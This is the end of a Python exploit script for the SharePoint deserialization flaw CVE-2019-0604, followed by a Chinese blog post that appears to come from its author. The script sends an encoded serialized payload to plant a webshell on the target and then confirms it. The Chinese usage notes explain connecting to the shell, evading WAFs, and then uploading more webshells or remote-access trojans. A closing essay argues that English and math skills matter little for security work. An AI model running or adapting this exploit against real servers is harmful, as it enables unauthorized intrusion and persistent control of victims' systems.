'__VIEWSTATE':'/wEPDwULLTIwNTYyMzI3OTQPZBYCZg9kFgQCBQ9kFgICBQ9kFgJmD2QWAgIBD2QWAmYPFgIeBFRleHQFBlBpY2tlcmQCCQ9kFgICBw9kFgwCAw9kFgJmDxYEHgxFcnJvck1lc3NhZ2VlHgtIdG1sTWVzc2FnZQVpPHNwYW4gY2xhc3M9Im1zLWVycm9yIj5BbiBlcnJvciBvY2N1cnJlZC4gQWRtaW5pc3RyYXRvcnMsIHNlZSB0aGUgc2VydmVyIGxvZyBmb3IgbW9yZSBpbmZvcm1hdGlvbi48L3NwYW4+ZAIFD2QWAmYPZBYCZg9kFgJmD2QWAgIBD2QWAmYPDxYCHwBlFgIeCW9ua2V5ZG93bgW1AXZhciBlPWV2ZW50OyBpZighZSkgZT13aW5kb3cuZXZlbnQ7IGlmKCFicm93c2VyaXMuc2FmYXJpICYmIGUua2V5Q29kZT09MTMpIHsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDdfcXVlcnlCdXR0b24nKS5jbGljaygpOyByZXR1cm4gZmFsc2U7IH1kAgcPZBYCZg8PFgIfAAVpPHNwYW4gY2xhc3M9Im1zLWVycm9yIj5BbiBlcnJvciBvY2N1cnJlZC4gQWRtaW5pc3RyYXRvcnMsIHNlZSB0aGUgc2VydmVyIGxvZyBmb3IgbW9yZSBpbmZvcm1hdGlvbi48L3NwYW4+ZGQCCQ9kFgJmDw8WAh8AZWRkAgsPZBYCZg8PFgIeEkNPTFVNTkRJU1BMQVlOQU1FUxYAZGQCDQ9kFgICAQ9kFgQCAQ8WAh4FdmFsdWUFBkFkZCAtPmQCAw9kFgJmDw8WCh4OQ1VTVE9NUFJPUEVSVFllHgVXaWR0aBsAAAAAAABZQAcAAAAeCUlTQ0hBTkdFRGgeBF8hU0ICgAIeDEVuYWJsZUJyb3dzZWgWGB4OZWRpdG9yT2xkVmFsdWVlHgpSZW1vdmVUZXh0BQZSZW1vdmUfBWUeDU5vTWF0Y2hlc1RleHQFEU5vIE1hdGNoaW5nIEl0ZW1zHgphbGxvd0VtcHR5BQExHg1Nb3JlSXRlbXNUZXh0BQ1Nb3JlIEl0ZW1zLi4uHhhwcmVmZXJDb250ZW50RWRpdGFibGVEaXYFBHRydWUeHXNob3dEYXRhVmFsaWRhdGlvbkVycm9yQm9yZGVyBQVmYWxzZR4LYWxsb3dUeXBlSW4FBWZhbHNlHgppblZhbGlkYXRlBQVmYWxzZR4bRUVBZnRlckNhbGxiYWNrQ2xpZW50U2NyaXB0ZR4eU2hvd0VudGl0eURpc3BsYXlUZXh0SW5UZXh0Qm94BQEwFgICBA8PFgYfBxsAAAAAAABZQAcAAAAeCENzc0NsYXNzBQ1tcy11c2VyZWRpdG9yHwkCggJkFgRmDw8WBB4NVmVydGljYWxBbGlnbgsqJ1N5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuVmVydGljYWxBbGlnbgMfCQKAgAhkFgJmD2QWAmYPZBYCZg9kFgJmD2QWBGYPFigeCHRhYmluZGV4BQEwHgdvbmZvY3VzBbEBU3RvcmVPbGRWYWx1ZSgnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScpOyBzYXZlT2xkRW50aXRpZXMoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTsgU3lzLlVJLkRvbUVsZW1lbnQuYWRkQ3NzQ2xhc3ModGhpcywgJ21zLWlucHV0Qm94QWN0aXZlJyk7Hg5hcmlhLW11bHRpbGluZQUEdHJ1ZR4Gb25ibHVyBYEDaWYodHlwZW9mKEV4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKT09J2Z1bmN0aW9uJyl7IGlmKFNob3VsZENhbGxDdXN0b21DYWxsQmFjaygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsZXZlbnQpKXtpZighVmFsaWRhdGVQaWNrZXJDb250cm9sKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jykpe1Nob3dWYWxpZGF0aW9uRXJyb3IoKTtyZXR1cm4gZmFsc2U7fWVsc2Uge0V4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7fX19IFN5cy5VSS5Eb21FbGVtZW50LnJlbW92ZUNzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx4Hb25jbGljawVHb25DbGlja1J3KHRydWUsIHRydWUsZXZlbnQsJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseCG9uY2hhbmdlBT91cGRhdGVDb250cm9sVmFsdWUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseB29uUGFzdGUFOmRvcGFzdGUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnLGV2ZW50KTsfEAUEdHJ1ZR4MQXV0b1Bvc3RCYWNrBQEwHgRyb3dzBQExHgtvbkRyYWdTdGFydAUOY2FuRXZ0KGV2ZW50KTseB29ua2V5dXAFPXJldHVybiBvbktleVVwUncoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTseBm9uQ29weQU5ZG9jb3B5KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1JyxldmVudCk7HgV0aXRsZQUURXh0ZXJuYWwgSXRlbSBQaWNrZXIfAwVQcmV0dXJuIG9uS2V5RG93blJ3KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1JywgMywgZmFsc2UsIGV2ZW50KTseCnNwZWxsY2hlY2sFBWZhbHNlHg9jb250ZW50RWRpdGFibGUFBHRydWUeDWFyaWEtaGFzcG9wdXAFBHRydWUeBXN0eWxlBTp3b3JkLXdyYXA6IGJyZWFrLXdvcmQ7b3ZlcmZsb3cteDogaGlkZGVuO292ZXJmbG93LXk6IGF1dG87HgRyb2xlBQd0ZXh0Ym94ZAIBDw8WCh4IVGFiSW5kZXgBAAAfBxsAAAAAAABZQAcAAAAeBFJvd3MCAR8faB8JAoACFhIfGQWxAVN0b3JlT2xkVmFsdWUoJ2N0bDAwX1BsYWNlSG9sZGVyRGlhbG9nQm9keVNlY3Rpb25fY3RsMDUnKTsgc2F2ZU9sZEVudGl0aWVzKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7IFN5cy5VSS5Eb21FbGVtZW50LmFkZENzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx8iBT1yZXR1cm4gb25LZXlVcFJ3KCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7HyQFFEV4dGVybmFsIEl0ZW0gUGlja2VyHx0FP3VwZGF0ZUNvbnRyb2xWYWx1ZSgnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScpOx8bBYEDaWYodHlwZW9mKEV4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKT09J2Z1bmN0aW9uJyl7IGlmKFNob3VsZENhbGxDdXN0b21DYWxsQmFjaygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsZXZlbnQpKXtpZighVmFsaWRhdGVQaWNrZXJDb250cm9sKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jykpe1Nob3dWYWxpZGF0aW9uRXJyb3IoKTtyZXR1cm4gZmFsc2U7fWVsc2Uge0V4dGVybmFsQ3VzdG9tQ29udHJvbENhbGxiYWNrKCdjdGwwMF9QbGFjZUhvbGRlckRpYWxvZ0JvZHlTZWN0aW9uX2N0bDA1Jyk7fX19IFN5cy5VSS5Eb21FbGVtZW50LnJlbW92ZUNzc0NsYXNzKHRoaXMsICdtcy1pbnB1dEJveEFjdGl2ZScpOx8oBSJkaXNwbGF5OiBub25lO3Bvc2l0aW9uOiBhYnNvbHV0ZTsgHwMFUHJldHVybiBvbktleURvd25SdygnY3RsMDBfUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbl9jdGwwNScsIDMsIGZhbHNlLCBldmVudCk7Hx8FATAeGnJlbmRlckFzQ29udGVudEVkaXRhYmxlRGl2BQR0cnVlZAICDw8WAh4HVmlzaWJsZWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgU0Y3RsMDAkUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbiRjdGwwNyRxdWVyeUJ1dHRvbgUoY3RsMDAkUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbiRjdGwwNVdO0+ZP+kKR1gMQud0zVHpuy8sqq7e4YSOgfg1USdFj', '__VIEWSTATEGENERATOR':'A123E449', ct1+paySection+'$ctl07$queryTextBox':'', paySpanData:payload1+'4700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f300'+payload2+'5600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e600160027009700d000a0008700d600c600e6003700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e6002200d000a0008700d600c600e6003700a3008700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c6002200d000a0008700d600c600e6003700a30035009700370047005600d600d30022003600c6002700d200e6001600d600560037000700160036005600'+payload3+'0e200250056000700c6001600360056008200070077004600b2002200d300d300d3002200c200220022009200b300560067001600c60082003600f60046005600c20022005700e600370016006600560022009200b3000200d700b3005200e500620076004700b3000200620076004700b3000200220052003400f600d600d600f600e60005002700f600760027001600d60064009600c600560037005200c500d400960036002700f6003700f600660047000200350086001600270056004600c500750056002600020035005600270067005600270002005400870047005600e60037009600f600e6003700c50013005300c50045005400d4000500c400140045005400c500c40014009500f400550045003500c50057001600e2001600370007008700220002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b300d000a000900090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b300d000a00090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b300d000a0006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300d000a000c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300', ct1+paySection+ct2+'$OriginalEntities':'<Entities />', ct1+paySection+ct2+'$HiddenEntityKey':'', ct1+paySection+ct2+'$HiddenEntityDisplayText':'', ct1+paySection+ct2+'$downlevelTextBox':' ', '__CALLBACKID':ct1+paySection+'$ctl07', '__CALLBACKPARAM':';#;#11;#;#;#', '__EVENTVALIDATION':'/wEdAArGxMN0ZJ7K9w5zktdyYEhBD0ElpjQ1qya+g3gJn5tj2kGdpzwPwReE9qIrxAfsdm2iW+aWbiEcyxsYaScsTlQ450VsGNyXdI9EVzK0gDisZ5XfOLdqAfYHRFskSc14VkFc8gJL9PF80m6F3xAWwiF2sOBSyZzTvibJdZIQ6/yiluhmzA7nAUttaM/XaeAk14GgLvO2vw2Ax/oUZshBCs1rvRIjfjnjQxx1nrwDNJpAlG8icRe2xKLDvCGTmWjcu2A='} data = urllib.urlencode(values) req = urllib2.Request(url+spver, data) response = urllib2.urlopen(req) the_page = response.read() print exp+'\n'+payload5 print the_page headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language": "en", "Cache-Control": "max-age=0", "Connection": "keep-alive", "Cookie": "PHPSESSID=m2hbrvp548cg6v4ssp0l35kcj7; _ga=GA1.2.2052701472.1532920469; _gid=GA1.2.1351314954.1532920469; __atuvc=3%7C31; __atuvs=5b5e9a0418f6420c001", #"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "Upgrade-Insecure-Requests": "1", uapay: payload4, } data = {"__CALLBACKID": "", "__VIEWSTATE": "", 'ctl00$'+paySection+'$': "", "__CALLBACKID": "All", "__CALLBACKPARAM": ""} response = requests.get(shellurl, headers=headers, timeout=5) if response.content=='UAshell': print 'UAshell: '+shellurl
实战:
python cve-2019-0604-exp.py http://k8gege.github.io
若成功返回WebShell地址
UAshell访问报错,大家不要慌,原本设计就是这样子
使用K8飞刀CMD连接,当然你可以通过CMD下载其它的WebShell过去管理
比如菜刀,因为飞刀UA系列的WebShell除了过WAF,均无文件管理功能
使用UA而不使用菜刀一句话,是因为菜刀一句话都是POST,容易被WAF拦截
当然你传过去后发现目标无WAF或无杀软,再传其它Webshell或植入远控都可以
下载:
https://github.com/k8gege/CVE-2019-0604
https://github.com/k8gege/K8tools/raw/master/cve-2019-0604-exp.py
Tips:
最近刚高考完不久,所以会在群里看到一些人说学信息安全需要英文、数学好才能学得好。
1.英文
英语这个就不用说了,文章开头的“段子”,最早是剑桥大学发的,就是说那个“段子”是英文的
说明了什么,所谓语法并不重要,中文也是一样,当你有一定意识,乱你也看得懂。
打个比方,大家都懂的SQL注入基础,文中告诉你注入点URL和SQL注入参数,
不管是英文还是中文文章,你都知道如何利用Sqlmap去跑吧,但是你让一个无基础的
就算是中文的写的非常详细的,不说中文有人用他的家乡话和他说,他都不懂。
文章开头那个“段子”看完大脑自动排序拼接成通顺句子,前提也是他有一定基础
很多人说什么新的漏洞新的APT攻击都是英文的看不懂,这关英文的事???
GOOGLE翻译、百度翻译被你吃了???最多就是翻译后中文顺序乱而已?
你没上过小学,汉字都看不懂???真正看不懂的人是所谓APT里的技术看的人不懂
目前90%的APT文章所提到的技术80%都是10年前的技术,并无多少新技术。
倒是新的名词一堆一堆,和以前相比听起来非常高大上,实际上技术变化不大。
2.数学
数学如果说是考试的话,数学方面国人绝对甩老外几百条街,
听说国外对数很头疼 ,国外很多大学数学内容竟是中国初中数学
但是最好笑的是很多数学定理却是老外发明的,是不是说明了什么
为什么老外考试很差,但科技还是很多方面却非常强。
3.实例
先给大家举个例子,我有两个高中同学一个是当年唯一考得上柳高的人综合成绩全年级第一。
另一个也很历害,年级前10吧,但我重点要说的是他的英文很优秀,物理数学也算是优吧
但单科他们都要请教我,比如我物理化学基本上也是全年级第一,而且是实打实,得知几分
立马知道错哪里,为什么错那种,而其它人表面高分,未必知到错哪,需老师讲解后才懂。
而我是全校出了名的偏科,我的英文并不好(初中的时候英文老师说我不学英文就混不了)
表面上我英文几十分偶尔极格,就算是也只是表面极格,实际上我的英文和倒数第一差不多
对于两位高中同学,我给他们英文数学的评价优秀,大学他们去学了计算机软件开发专业。
大学的时候他们和我说毕业以后要给银行开发系统什么之类的,听着非常牛逼的样子。
当时他们吹自己IT方面很牛,黑客技术很历害,说自己的生活费都是盗号来的。
我以为他们真的很历害,因为当时盗号真的很容易,那会我还不是很会编程。
在我眼里会编程的很牛B,何况他们说他们随便写什么系统,盗号软件之类的。
过了半年左右吧,回老家遇到他们,他们好像知道我真的懂,就和我说他们是吹的
想和我学,我说你们要真有兴趣可以去哪些网站上面有我视频,也没见他们去。
毕业听说成绩全年级第一的现在听说在跑业务了,另外一个现在在当小学老师。
不说我的同学,你们的同学,先不说有多少进入这行的大牛和信安专业无关,
先看看你们很多信安专业毕业的,同一个班里有几个毕业了从事信安专业的?
有些人的同学里有那些英文很好的,但也没见得从事这行呀。
4.我认为学好IT最重要的一点是兴趣、逻辑思维
解数学题是训练逻辑思维的最好方法,数学好的逻辑思维基本上都不错。
但数学并不是唯一的训练方法,比如推理、下棋啊,需要思考的方法
渗透的时候不就是需要尝试各种方法吗,写程序也一样需要尝试各种函数
很多程序员死板,是因为他们的工作太单一,来来去去就写固定模块或功能
当然逻辑思维不错,也不代表他在IT方面就强,他还得有兴趣学这个。
注意我指的是那些真懂的,不是死记硬背不懂举一反三,表面考试高分的那种。
这也是为什么很多人考试历害,实际上却干不过国外的真正原因。
如果笨的人呢就不适合这行吗?当然没有别人聪明也没关系,你需要多花时间学习
最多就是起步慢一些,很多东西自然会懂的,来来去去就几招,没有学不会的。
但是你自己菜,还要拿英语、数学不好这种来当借口的话,我认为你是真的不适合
如果你一直干这行,你的水平会一直停留在等别人发布文章或工具甚至教程的状态。
就拿本文EXP来说,你说英文不好是吧,你可以不看原文,国内有很多英文好的翻译好了
有直接的中文文章中文你看不懂吗?再说cve-2019-0604漏洞出来那么久,你身边英文好的
有几个研究出EXP了?对于中文的很多人都看得懂了吧,为什么也还没人放出EXP工具
真正的原因是什么,并非你是否看得懂哪国文字,根本原因在于你当前的技术水平。
英文好最多就是看英文和看中文一样流畅,翻译成中文看起来一样速度快(大脑自动排序)
明明错乱顺序的文字你一样看得懂,更何况大部份翻译也不是太差,菜和英文真的无关。
写代码就更不需要了,很多开发工具都有提示的,打出首字母会显示出很多,
只要你知道大概长啥样就可以,再不济百度Google查询,微软工程师开发的工具,
写代码时自己都要查看相关文档,科学家研究东西照样需要查找各种资料。
还有很多大牛都说看书只是入门,GOOGLE才是提高(TK在微博和知乎上也经常说这句话)
你区区一个搞IT的,百度GOOGLE查资料你丢脸了?又菜又懒还喜欢找各种借口
这个世界上最可怕的不是有人比你聪明。而是那些比你聪明的人。还比你努力。